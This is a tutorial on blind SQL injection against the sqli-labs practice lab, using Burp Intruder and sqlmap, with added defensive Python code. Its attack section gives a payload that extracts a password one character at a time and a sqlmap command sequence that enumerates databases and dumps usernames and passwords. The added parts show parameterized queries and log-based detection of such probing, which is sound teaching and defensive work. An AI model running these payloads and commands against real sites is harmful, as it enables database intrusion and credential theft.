[Tools] Running SQL blind injection
2022-07-03 04:38:00 【Black zone (rise)】
Contents
1. (Tool) Burp: running blind injection
1.2. Method 2: brute-forcing with an injection statement
2. (Tool) sqlmap: running Boolean blind injection
Step 1: Detect whether an injection exists
Step 2: Enumerate database names
Step 3: Enumerate table names
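1. (Tool) Burp: running blind injection
1.1. Method 1: brute force
After capturing the request, send it to the "Intruder" module.
Set up 2 payloads.
1.2. Method 2: brute-forcing with an injection statement
Construct the injection statement and iterate over its two payload positions (§0§ is the candidate character, §1§ is the character position in the string):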
(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)
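As an added illustration (not code from the original post), the Python below shows why the statement above acts as a true/false oracle when input is concatenated into the query, and how a bound parameter removes that oracle. It runs against an in-memory SQLite database with constructed data, so substring is written as substr; the function names are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names follow the statement above.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE employees "
               "(empid INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    db.execute("INSERT INTO employees VALUES (1, 'alice', 'S3cret')")
    return db

def probe(char, pos):
    # The article's statement with the two Intruder positions filled in
    # (substr instead of substring so it runs on any SQLite version).
    return ("(select case when '%s' = lower(substr((select password from "
            "employees where empid=1),%d,1)) then 1 else 0 end)" % (char, pos))

def lookup_vulnerable(db, empid):
    # Input becomes part of the SQL text, so a subquery inside it is executed.
    # The caller only learns "row found" or "no row": a one-bit oracle.
    sql = "SELECT name FROM employees WHERE empid = " + empid
    return db.execute(sql).fetchone() is not None

def lookup_hardened(db, empid):
    # Input is bound as a value; the subquery text is compared, never executed.
    sql = "SELECT name FROM employees WHERE empid = ?"
    return db.execute(sql, (empid,)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    for guess in ("s", "x"):
        print(guess,
              "vulnerable:", lookup_vulnerable(db, probe(guess, 1)),
              "hardened:", lookup_hardened(db, probe(guess, 1)))
```

With the bound parameter, a correct guess and a wrong guess produce the same response, so there is nothing to iterate over.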
2. (Tool) sqlmap: running Boolean blind injection
2.1. Commands:
-u Specify the injection point
--dbs Enumerate database names
--tables Enumerate table names
--columns Enumerate column names
--dump Dump the data
Once each item has been enumerated, add in turn -D to specify the database, -T to specify the table, and -C to specify the column.
2.2. Usage process:
Step 1: Detect whether an injection exists
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --batch
--batch uses the default settings.
In fact, the scan has already identified the environment,
so you can add --dbms mysql.
Step 2: Enumerate database names
Command
# Get all databases
sqlmap.py -u url --dbs --batch
---------
# Get the current database
sqlmap.py -u url --current-db --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch
Step 3: Enumerate table names
Command
python sqlmap.py -u url -D DB --tables --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch
Step 4: Enumerate column names
Command:
sqlmap.py -u url -D DB -T TBL --columns --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch
Step 5: Dump the data
Command:
sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch
Basic operation :
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch
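Seen from the server side, the sqlmap steps above and the Burp iteration in section 1.2 both leave many requests that read one character at an increasing offset. The following is an added detection example in Python (not part of the original post); the log lines, IP addresses, sqlmap version string and function names are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import quote, unquote_plus

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d+ \S+ '
                  r'"[^"]*" "([^"]*)"')
# substring()/substr()/mid() reading exactly one character at a numeric offset
PROBE = re.compile(r"(?i)\b(?:substring|substr|mid)\s*\(.*?,\s*(\d+)\s*,\s*1\s*\)")

def _line(ip, value, ua):
    # Builds one constructed combined-log-format line for the sample below.
    return ('%s - - [03/Jul/2022:04:30:00 +0000] "GET /Less-5/?id=%s HTTP/1.1" '
            '200 712 "-" "%s"' % (ip, quote(value), ua))

BURP = ("(select case when 'a' = lower(substring((select password from "
        "employees where empid=1),%d,1)) then 1 else 0 end)")
SQLMAP = "1' AND ORD(MID((SELECT DATABASE()),%d,1))>64-- -"

# Constructed sample traffic, not captured logs.
SAMPLE_LOG = "\n".join(
    [_line("10.0.0.5", v, "Mozilla/5.0") for v in ("1", "2")]
    + [_line("10.0.0.7", BURP % p, "Mozilla/5.0") for p in (1, 2, 3)]
    + [_line("10.0.0.9", SQLMAP % p, "sqlmap/1.6#stable (https://sqlmap.org)")
       for p in (1, 2)]
)

def find_blind_probing(log_text, min_positions=3):
    """Return {client_ip: [reasons]} for clients that look like blind-injection runs."""
    positions, findings = defaultdict(set), defaultdict(set)
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        ip, target, ua = m.groups()
        # The User-Agent is client-controlled, so treat it as a weak signal only.
        if ua.lower().startswith("sqlmap/"):
            findings[ip].add("sqlmap user-agent")
        hit = PROBE.search(unquote_plus(target))
        if hit:
            positions[ip].add(int(hit.group(1)))
    # Several distinct offsets from one client indicate per-character extraction.
    for ip, seen in positions.items():
        if len(seen) >= min_positions:
            findings[ip].add("character-by-character extraction")
    return {ip: sorted(reasons) for ip, reasons in findings.items()}

if __name__ == "__main__":
    print(find_blind_probing(SAMPLE_LOG))
```

The offset rule only sees payloads carried in the URL; requests that carry the parameter in a POST body need the same check applied to request-body logs.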
3. Recommended
[SQL injection - no echo] Boolean blind injection: principle, functions, usage process
[SQL injection - with echo] DNS request injection: principle, platform, usage process, configuration